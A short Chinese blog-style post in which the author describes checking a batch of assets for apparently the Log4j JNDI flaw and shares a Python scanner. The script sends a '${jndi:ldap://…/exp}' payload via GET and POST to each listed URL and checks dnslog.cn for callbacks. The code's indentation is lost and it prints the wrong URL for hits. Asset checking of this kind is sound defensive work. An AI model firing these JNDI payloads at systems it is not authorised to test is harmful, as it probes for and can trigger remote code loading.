连续工作了十二天,本来想着周五能轻松一点,结果来了这个漏洞,要检测一大批资产,看了一下复现方法,然后写了个脚本检测,利用dnslog回显检测,不过只是单纯post和get payload而已(只能针对网站把用户提交的错误数据全部写到日志的情况进行检测)。然后,,,扫不出来,只能手工了。后续有环境在修改,读者也可自行修改,循环遍历一下参数字典。
import requests
from urllib.parse import quote
url="http://dnslog.cn/getdomain.php"
url1="http://dnslog.cn/getrecords.php"
file=input("请输入url文件保存路径:");#"C:\\Users\\ASUS\\Desktop\\ces1.txt";
with open(file,"r") as file1:
for i in file1.readlines():
data1 = "${jndi:ldap://"
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"}
request=requests.get(url,headers=header)
cookie=request.headers["Set-Cookie"]
respone=request.content.decode("utf-8")
data1=data1+respone+"/exp}";
data=[data1,quote(data1,'utf-8')]
url3=i.strip('\n');
try:
for data2 in data:
request1 = requests.post(url3, data=data2,timeout=3);
request1 = requests.get(url3, data=data2,timeout=3);
except:
flag=1;
header["Cookie"]=cookie;
request1=requests.get(url1,headers=header)
if request1.content.decode("utf-8")!="[]":
print(url+"存在漏洞")